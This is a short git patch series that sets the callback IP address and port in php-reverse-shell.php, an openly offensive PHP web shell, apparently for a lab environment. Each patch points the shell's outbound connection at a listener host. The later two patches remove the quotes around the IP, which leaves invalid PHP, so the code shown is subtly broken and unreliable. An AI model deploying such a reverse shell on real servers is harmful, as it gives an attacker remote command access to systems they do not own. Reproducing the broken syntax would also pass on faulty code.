From 818741e32e20d0c5c97fb7c09283fd7a4889a04e Mon Sep 17 00:00:00 2001 From: BellyBear Date: Thu, 17 Oct 2024 01:25:40 +0900 Subject: [PATCH 1/3] Update php-reverse-shell.php 1111 port --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..c115f08 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '192.168.45.200'; // CHANGE THIS +$port = 1111; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; From 96e1809406acc909f895f086eacd632185427742 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Thu, 17 Oct 2024 01:29:35 +0900 Subject: [PATCH 2/3] Update php-reverse-shell.php --- php-reverse-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index c115f08..c170eba 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,7 +46,7 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '192.168.45.200'; // CHANGE THIS +$ip = 192.168.45.200; // CHANGE THIS $port = 1111; // CHANGE THIS $chunk_size = 1400; $write_a = null; From d535a3fa3c121efdb006f849576c7bd9de0d3d64 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Thu, 17 Oct 2024 01:31:29 +0900 Subject: [PATCH 3/3] Update php-reverse-shell.php --- php-reverse-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index c170eba..0a85160 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,7 +46,7 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = 192.168.45.200; // CHANGE THIS +$ip = 192.168.171.128; // CHANGE THIS $port = 1111; // CHANGE THIS $chunk_size = 1400; $write_a = null;